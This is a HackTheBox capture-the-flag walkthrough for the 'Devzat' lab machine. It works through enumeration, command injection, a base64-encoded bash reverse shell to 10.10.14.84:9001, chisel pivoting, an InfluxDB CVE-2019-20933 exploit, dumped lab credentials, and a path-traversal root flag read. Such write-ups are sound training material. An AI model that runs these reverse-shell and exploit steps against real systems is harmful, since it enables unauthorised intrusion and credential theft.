Devzat - HackTheBox Walkthrough

CONTENT :

1. Connecting to HTB machine
2. Nmap scanning
3. Adding to localhost
4. Fuff scanning
5. Git source code enumeration
6. Using Wireshark
7. Getting reverse shell
8. Using burpsuite
9. Pivoting
10. InfluxDB exploitation
11. Switching to Catherine
12. Root flag captured

1. CONNECTING TO HTB [via VPN]:

First of all, we need to connect to the HTB machine using a VPN that is downloaded from HTB.
My VPN:lab_dracula2001.ovpn
command: Openvpn lab_dracula2001.ovpn [command used to connect the VPN]

Machine IP 10.10.11.118

2. Nmap Scanning [ for open ports]:

Nmap tool is used to scan the open ports.
commands: nmap -sC -sV -A -Pn 10.10.11.118

Nmap scan result: Port 22, Port 80, Port 8000, apache service is running on port 80, so here we get to know that there is a webpage running.

3. Adding to localhost :

But here we need to add this to our local host otherwise we can't view the website.
Command: nano /etc/hosts [ this is used to add hosts]

After setting up localhost we will be able to view the website.

Gobuster scanning:

I tried using gobuster scan and didn't get the result , so just move on to vhost scanning using ffuf
command : gobuster dir -u http://10.10.11.118:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium [gobuster dir - u (URL of website) - w (wordlist)]

4. Fuff scanning :

command:fuff - w /usr/share/seclists/Discovery/DNS/subdomains-topmillion- 5000.txt -mc 200 -c -u https://devzat.htb/ -H "HOST: FUZZ.devzat.htb"
After scanning, we get to know that vhost pets (website) and need to add this to the localhost file.

scanning web directory pets.devzat.htb:
Command : ffuf -u http: //pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content-raft-small- words.txt -fs 510

5. Git source code enumeration :

Here we needed to go through each directory to find the git file and download it.
Command : wget -r -np -R "index.html" http://pets.devzat.htb/.git
and filename is pets.devzat.htb

After downloading, go through the directories and check for the git status using the command git status :

And here many files have been deleted, so we need to restore them.
the command used to restore: git restore .

Here let's go through the file called main.go
command : cat main.go [ command used to view the content inside the file]

After going through the file, we get to know that the website pets.devzat.htb has command injection vulnerable [ command injection is possible in species]

6. Using Wireshark :

Wireshark result to show vulnerable by capturing the icmp echos

7. Getting reverse shell :

For gaining access to reverse shell, we need to make a payload using the following command.
Command : echo -n 'bash -I>&/dev/tcp/10.10.14.84/9001 0>&1' | base64

8. Using Burpsuite:

Now using the burpsuite to intercept the web request.

To intercept the web request, we need to turn on the "intercept is on " in proxy option, on the burpsuite application. After that go to the website and turn on proxy.

Here we got intercepting result and place the payload in species section as shown below :

After adding payload start-up the listner.
Command : nc -lnvp 9001

Now we got the reverse shell access. After getting reverse shell, checks for the system id which shows the results as :
Command: id

9. Pivoting :

Here we use chisel tool to port forward back to the attackers machine.chisel is downloaded and configured from Github to our machine and then it is transferred to devzat by using python server.

Chisel on devtaz machine:

After port forwarding, we have to run a nmap scan.

Command : nmap -p 8086 -sV 127.0.0.1

10. InfluxDB exploitation:

After doing nmap scan we get to know that influxDb service is running on port 8086, so now we have to search for it exploits.

URL of github (exploit) : https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE- 2019–20933

Command : git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE- 2019–20933

Download it and give permission

Command : chmod +x__ main__.py
pip install -r requirements.txt

After doing these steps start the influxDB exploit.

Command: python3___main__.py

List the table using.

Command: SHOW MEASUREMENTS

After that dump user.

Command: *select from "user"

User: catherine
Password: woBeeYareedahc7Oogeephies7Aiseci

Now we got the password of Catherine's user, so we can log in as Catherine's user.

11. Switching to Catherine user :

Command: *su Catherine

       cat user.txt* [ to view the user flag]

User flag:

Here we got a zip files named devzat-dev.zip and devzat-main.zip so we need to unzip it into /tmp directory

Command : cp devzat-dev.zip /tmp

From the diff command, the "dev" environment implements the file reading function using the file command with password protection. The "dev" environment is running on localhost port 8443, hence from the initial enumeration using Patrick account unable to check the process running 8443.

Command: diff dev/commands.go main/commands.go

Now, need to download chisel in Catherine user for port forwarding

after downloading we need to give permission to chisel file.

Command : chmod +x chisel_1.7.3_linux_amd64

Now we need to do port forwarding from here to our own machine by using the tool we previously used (chisel) and ssh port will be 8443.

Command : ssh -l test 127.0.0.1 -p 8443

12. Root flag capturing:

Command : /file ../root.txt CeilingCatStillAThingin2021?

Finally, the system is PWNED !!